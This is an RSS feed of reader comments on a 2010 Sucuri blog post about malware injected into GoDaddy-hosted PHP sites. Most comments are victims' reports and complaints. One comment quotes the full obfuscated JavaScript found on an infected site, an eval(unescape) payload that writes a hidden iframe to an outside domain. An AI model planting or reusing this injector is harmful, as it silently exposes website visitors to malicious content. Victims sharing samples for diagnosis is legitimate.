<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Found code used to inject the malware at GoDaddy</title>
	<atom:link href="http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html</link>
	<description>Protect Your Interwebs</description>
	<lastBuildDate>Tue, 07 Feb 2012 14:40:59 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: GoDaddy On The Run From PHP Attackers</title>
		<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/comment-page-1#comment-2261</link>
		<dc:creator>GoDaddy On The Run From PHP Attackers</dc:creator>
		<pubDate>Wed, 10 Nov 2010 04:59:57 +0000</pubDate>
		<guid isPermaLink="false">http://blog.sucuri.net/?p=18#comment-2261</guid>
		<description>[...] exploited sites on GoDaddy,&#8221; read the update. The affected sites generally ran some kind of PHP Web application, such as Zen Cart eCommerce or popular CMS packages including WordPress, Drupal and Joomla, [...]</description>
		<content:encoded><![CDATA[<p>[...] exploited sites on GoDaddy,&#8221; read the update. The affected sites generally ran some kind of PHP Web application, such as Zen Cart eCommerce or popular CMS packages including WordPress, Drupal and Joomla, [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: @XpertDevelopers</title>
		<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/comment-page-1#comment-2164</link>
		<dc:creator>@XpertDevelopers</dc:creator>
		<pubDate>Sun, 19 Sep 2010 10:20:48 +0000</pubDate>
		<guid isPermaLink="false">http://blog.sucuri.net/?p=18#comment-2164</guid>
		<description>Hi, 
My files get infected with below code.. 
Its a javascript code. Fix at this url is not working for me.. &lt;a href=&quot;http://sucuri.net/malware/helpers/wordpress-fix_php.txt&quot; rel=&quot;nofollow&quot;&gt;http://sucuri.net/malware/helpers/wordpress-fix_p...&lt;/a&gt; 
Injected code is looks like below: 
&lt;script&gt;eval(unescape(&#039;%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%71%61%77%66%65%72%2E%63%6F%6D%2F%3F%36%30%34%35%37%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29&#039;));&lt;/script&gt;&lt;!-- uy7gdr5332rkmn --&gt; </description>
		<content:encoded><![CDATA[<p>Hi,<br />
My files get infected with below code..<br />
Its a javascript code. Fix at this url is not working for me.. <a href="http://sucuri.net/malware/helpers/wordpress-fix_php.txt" rel="nofollow">http://sucuri.net/malware/helpers/wordpress-fix_p&#8230;</a><br />
Injected code is looks like below:<br />
&lt;script&gt;eval(unescape(&#039;%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%71%61%77%66%65%72%2E%63%6F%6D%2F%3F%36%30%34%35%37%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29&#039;));&lt;/script&gt;&lt;!&#8211; uy7gdr5332rkmn &#8211;&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Tweets that mention Found code used to inject the malware at GoDaddy &#124; Sucuri -- Topsy.com</title>
		<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/comment-page-1#comment-2067</link>
		<dc:creator>Tweets that mention Found code used to inject the malware at GoDaddy &#124; Sucuri -- Topsy.com</dc:creator>
		<pubDate>Wed, 15 Sep 2010 15:52:52 +0000</pubDate>
		<guid isPermaLink="false">http://blog.sucuri.net/?p=18#comment-2067</guid>
		<description>[...] This post was mentioned on Twitter by ccDcLeslie, Michael and Leslie. Michael and Leslie said: Found code used to inject the malware at GoDaddy &#124; Sucuri http://t.co/hMhOBBv [...]</description>
		<content:encoded><![CDATA[<p>[...] This post was mentioned on Twitter by ccDcLeslie, Michael and Leslie. Michael and Leslie said: Found code used to inject the malware at GoDaddy | Sucuri <a href="http://t.co/hMhOBBv" rel="nofollow">http://t.co/hMhOBBv</a> [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: morallydecrepit</title>
		<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/comment-page-1#comment-121</link>
		<dc:creator>morallydecrepit</dc:creator>
		<pubDate>Sun, 30 May 2010 12:09:09 +0000</pubDate>
		<guid isPermaLink="false">http://blog.sucuri.net/?p=18#comment-121</guid>
		<description>I asked GoDaddy for some logs so I could look at them myself and they said they couldn&#039;t do that.  Right now I&#039;ve just been checking my site every couple of days.  But I still haven&#039;t figure out how they get in.  I just delete all the hacked code from my php files.</description>
		<content:encoded><![CDATA[<p>I asked GoDaddy for some logs so I could look at them myself and they said they couldn&#39;t do that.  Right now I&#39;ve just been checking my site every couple of days.  But I still haven&#39;t figure out how they get in.  I just delete all the hacked code from my php files.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anonymous</title>
		<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/comment-page-1#comment-122</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Wed, 26 May 2010 22:17:25 +0000</pubDate>
		<guid isPermaLink="false">http://blog.sucuri.net/?p=18#comment-122</guid>
		<description>Hello Guys,&lt;br /&gt;&lt;br /&gt;I am also a victim.My suggestion is that if you are using any plugins like javascript and CSS optimizer then remove it. It&#039;s and RFI attack.Hope you all be happy with this.The attacker first distribute free program (open source) which working fine but he puts a security hole init for later use.He win the faith from us and then attack.</description>
		<content:encoded><![CDATA[<p>Hello Guys,</p>
<p>I am also a victim.My suggestion is that if you are using any plugins like javascript and CSS optimizer then remove it. It&#39;s and RFI attack.Hope you all be happy with this.The attacker first distribute free program (open source) which working fine but he puts a security hole init for later use.He win the faith from us and then attack.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anonymous</title>
		<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/comment-page-1#comment-123</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Tue, 25 May 2010 01:34:00 +0000</pubDate>
		<guid isPermaLink="false">http://blog.sucuri.net/?p=18#comment-123</guid>
		<description>its a php code like this eval(base64_decode..........................:/&gt;&lt;br /&gt;which is a virus script.&lt;br /&gt;i found it on the webpage..online</description>
		<content:encoded><![CDATA[<p>its a php code like this eval(base64_decode&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..:/><br />which is a virus script.<br />i found it on the webpage..online</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anonymous</title>
		<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/comment-page-1#comment-124</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Tue, 25 May 2010 01:32:16 +0000</pubDate>
		<guid isPermaLink="false">http://blog.sucuri.net/?p=18#comment-124</guid>
		<description>Guys this is the code which i fond on my webpage online running... ofline is deleted by antivirus&lt;br /&gt;&lt;br /&gt;&quot;&quot;</description>
		<content:encoded><![CDATA[<p>Guys this is the code which i fond on my webpage online running&#8230; ofline is deleted by antivirus</p>
<p>&quot;&quot;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anonymous</title>
		<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/comment-page-1#comment-125</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Sat, 15 May 2010 12:10:55 +0000</pubDate>
		<guid isPermaLink="false">http://blog.sucuri.net/?p=18#comment-125</guid>
		<description>As a web developer, the majority of my 56 sites online have been hacked the last couple of weeks.... but, they are spread across 11 different hosting companies, and are on both Linux and Windows servers My only WordPress site was hacked on May 12th, but all my BlogEngine.net sites (asp.net) have also been hacked. This is not just a PHP problem or a GoDaddy problem.</description>
		<content:encoded><![CDATA[<p>As a web developer, the majority of my 56 sites online have been hacked the last couple of weeks&#8230;. but, they are spread across 11 different hosting companies, and are on both Linux and Windows servers My only WordPress site was hacked on May 12th, but all my BlogEngine.net sites (asp.net) have also been hacked. This is not just a PHP problem or a GoDaddy problem.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anonymous</title>
		<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/comment-page-1#comment-126</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Fri, 14 May 2010 00:52:36 +0000</pubDate>
		<guid isPermaLink="false">http://blog.sucuri.net/?p=18#comment-126</guid>
		<description>This is the third time my site has been hacked within 20 days.Godday is not doing anything or they don&#039;t have the right person to control the situation.This way our websites future is in danger.Hope some way come out with solution.</description>
		<content:encoded><![CDATA[<p>This is the third time my site has been hacked within 20 days.Godday is not doing anything or they don&#39;t have the right person to control the situation.This way our websites future is in danger.Hope some way come out with solution.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anonymous</title>
		<link>http://blog.sucuri.net/2010/05/found-code-used-to-inject-the-malware-at-godaddy.html/comment-page-1#comment-127</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Thu, 13 May 2010 21:31:27 +0000</pubDate>
		<guid isPermaLink="false">http://blog.sucuri.net/?p=18#comment-127</guid>
		<description>For those blaming WP plugins, etc. (including Godaddy support) This has NOTHING to do with Wordpress or any other CMS code! Our simple coded from scratch site with PHP extensions has been hacked twice same as all the rest. Godaddy is aware of this, but they continue to try to deflect the blame onto others. They even lie. They deleted a file from my site that had &quot;good&quot; base 64 encoded code, then claimed they didn&#039;t do it.&lt;br /&gt;I think the GoDaddy girls do more for them than just look sexy. I think that they are responsible for Godaddy security and customer service also!</description>
		<content:encoded><![CDATA[<p>For those blaming WP plugins, etc. (including Godaddy support) This has NOTHING to do with WordPress or any other CMS code! Our simple coded from scratch site with PHP extensions has been hacked twice same as all the rest. Godaddy is aware of this, but they continue to try to deflect the blame onto others. They even lie. They deleted a file from my site that had &quot;good&quot; base 64 encoded code, then claimed they didn&#39;t do it.<br />I think the GoDaddy girls do more for them than just look sexy. I think that they are responsible for Godaddy security and customer service also!</p>
]]></content:encoded>
	</item>
</channel>
</rss>

